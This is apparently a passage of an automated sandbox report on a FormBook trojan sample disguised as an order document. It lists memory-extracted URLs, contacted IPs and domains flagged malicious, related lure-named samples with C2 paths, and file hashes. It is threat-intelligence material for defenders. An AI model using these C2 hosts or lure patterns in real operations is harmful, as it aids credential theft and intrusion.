                                                                                https://www.reg.ru/hosting/?utm_source=www.mosorehlable.online&utm_medium=parking&utm_campaign=s_lanUtilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.pngfirefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.aihuzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.minizhibo.comUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.parentwise.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.salmagundi.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.yujiezhibo.comUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.forsyte.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.qinglaizhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.pngUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.ecosia.org/newtab/Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/header.fe363a40.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.gesichtspflege.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.lianyizhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.aihuzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/pullup.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://laduta.xyz/5mxq?T4OdNH=iO94RS5UfBQ5HCoDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000003CE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.losbravos.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/WarehouseDataDataSet.xsdYhttp://tempuri.org/WarehouseDataDataSet1.xsdEkursachForAORDER REF 47896798 PSMCO.exefalse
                                                                                        		high
                                                                                        http://www.kanbzhibo.netfirefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.naturalelement.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.shareyourlove.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.reg.ru/dedicated/?utm_source=www.mosorehlable.online&utm_medium=parking&utm_campaign=s_lUtilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.salesa.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://companies.rbc.ru/Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.3xzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.xiuchangzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.anxinzhibo.comUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.souyouzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.aihuzhibo.net/template/news/wandoujia/static/js/nc.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          13.248.169.48
                                                                                          		www.londonatnight.coffeeUnited States
                                                                                          		16509AMAZON-02UStrue
                                                                                          199.192.21.169
                                                                                          		www.solidf.xyzUnited States
                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                          47.83.1.90
                                                                                          		www.cruycq.infoUnited States
                                                                                          		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                                                          192.64.119.109
                                                                                          		www.laduta.xyzUnited States
                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                          192.186.58.31
                                                                                          		www.aihuzhibo.netUnited States
                                                                                          		132721PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNLtrue
                                                                                          199.59.243.228
                                                                                          		www.deadshoy.techUnited States
                                                                                          		395082BODIS-NJUStrue
                                                                                          194.58.112.174
                                                                                          		www.mosorehlable.onlineRussian Federation
                                                                                          		197695AS-REGRUtrue
                                                                                          104.21.53.168
                                                                                          		www.neoparty.sbsUnited States
                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          154.213.39.66
                                                                                          		www.f5jh81t3k1w8.sbsSeychelles
                                                                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                          103.247.11.204
                                                                                          		itcomp.storeIndonesia
                                                                                          		58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDtrue

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1585942
                                                                                          Start date and time:2025-01-08 14:58:09 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 33s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:11
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:2
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:ORDER REF 47896798 PSMCO.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@10/7@17/10
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 75%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 91%
                                                                                          • Number of executed functions: 94
                                                                                          • Number of non-executed functions: 287
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 4.245.163.56, 20.109.210.53
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          08:58:59API Interceptor1x Sleep call for process: ORDER REF 47896798 PSMCO.exe modified
                                                                                          08:59:01API Interceptor8x Sleep call for process: powershell.exe modified
                                                                                          08:59:55API Interceptor10853028x Sleep call for process: Utilman.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          13.248.169.48236236236.elfGet hashmaliciousUnknownBrowse
                                                                                          • portlandbeauty.com/
                                                                                          profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.aktmarket.xyz/wb7v/
                                                                                          SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.xphone.net/i7vz/
                                                                                          RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                          • www.krshop.shop/5p01/
                                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                          • sharewood.xyz/administrator/index.php
                                                                                          MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.snyp.shop/4nyz/
                                                                                          Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.egyshare.xyz/lp5b/
                                                                                          AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.avalanchefi.xyz/ctta/
                                                                                          AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.avalanchefi.xyz/ctta/
                                                                                          Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.hsa.world/09b7/
                                                                                          199.192.21.169DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.lonfor.website/stiu/
                                                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.lonfor.website/bowc/
                                                                                          rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.sesanu.xyz/rf25/
                                                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.lonfor.website/bowc/
                                                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.lonfor.website/bowc/
                                                                                          inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.lonfor.website/bowc/
                                                                                          URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.technectar.top/ghvt/
                                                                                          FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.technectar.top/ghvt/
                                                                                          NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.tophm.xyz/30rz/
                                                                                          lPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.zenscape.top/d8cw/

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          www.deadshoy.techPayment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                          • 199.59.243.227
                                                                                          ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                          • 199.59.243.227
                                                                                          www.aihuzhibo.netrQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                          • 192.186.58.31
                                                                                          www.cruycq.infoDHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                          • 47.83.1.90
                                                                                          SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                          • 47.83.1.90
                                                                                          ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                          • 47.83.1.90

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          AMAZON-02UShttps://connect.intuit.com/portal/app/CommerceNetwork/view/scs-v1-01f29c80fd42416b93c1e1b116eb15aeb0bd36fe1ddc4e298589676767f7a30254c18947c53d4f9a9d199271c071ab8c?locale=EN_USGet hashmaliciousUnknownBrowse
                                                                                          • 44.229.88.240
                                                                                          malw.htaGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                          • 52.216.45.10
                                                                                          atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                          • 185.166.143.48
                                                                                          06012025_1416_bombastic.htaGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                          • 52.216.220.130
                                                                                          malw.htaGet hashmaliciousUnknownBrowse
                                                                                          • 54.231.132.66
                                                                                          http://www.hillviewlodge.hotelrent.topGet hashmaliciousUnknownBrowse
                                                                                          • 18.245.31.129
                                                                                          https://www.dollartip.info/unsubscribe/?d=mdlandrec.netGet hashmaliciousUnknownBrowse
                                                                                          • 52.222.232.30
                                                                                          https://wetransfert-devis-factgfd.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                          • 18.245.60.5
                                                                                          mail (4).emlGet hashmaliciousUnknownBrowse
                                                                                          • 52.29.116.175
                                                                                          invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                          • 185.166.143.50
                                                                                          VODANETInternationalIP-BackboneofVodafoneDEmiori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                          • 94.222.49.223
                                                                                          miori.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                          • 178.7.191.31
                                                                                          miori.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 134.98.122.114
                                                                                          sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                          • 88.65.127.125
                                                                                          miori.mips.elfGet hashmaliciousUnknownBrowse
                                                                                          • 145.253.87.183
                                                                                          miori.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 178.1.232.242
                                                                                          DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                          • 47.83.1.90
                                                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                                          • 47.83.1.90
                                                                                          x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                          • 92.73.125.180
                                                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                          • 84.61.150.162
                                                                                          NAMECHEAP-NETUSDHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                          • 199.192.21.169
                                                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                                          • 199.192.21.169
                                                                                          rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                                          • 68.65.122.71
                                                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                          • 199.192.21.169
                                                                                          https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 63.250.38.199
                                                                                          DUD6CqQ1Uj.docGet hashmaliciousUnknownBrowse
                                                                                          • 192.64.119.42
                                                                                          DUD6CqQ1Uj.docGet hashmaliciousUnknownBrowse
                                                                                          • 192.64.119.42
                                                                                          DUD6CqQ1Uj.docGet hashmaliciousUnknownBrowse
                                                                                          • 192.64.119.42
                                                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                          • 199.192.21.169
                                                                                          http://keywestlending.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                          • 104.219.248.99

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER REF 47896798 PSMCO.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
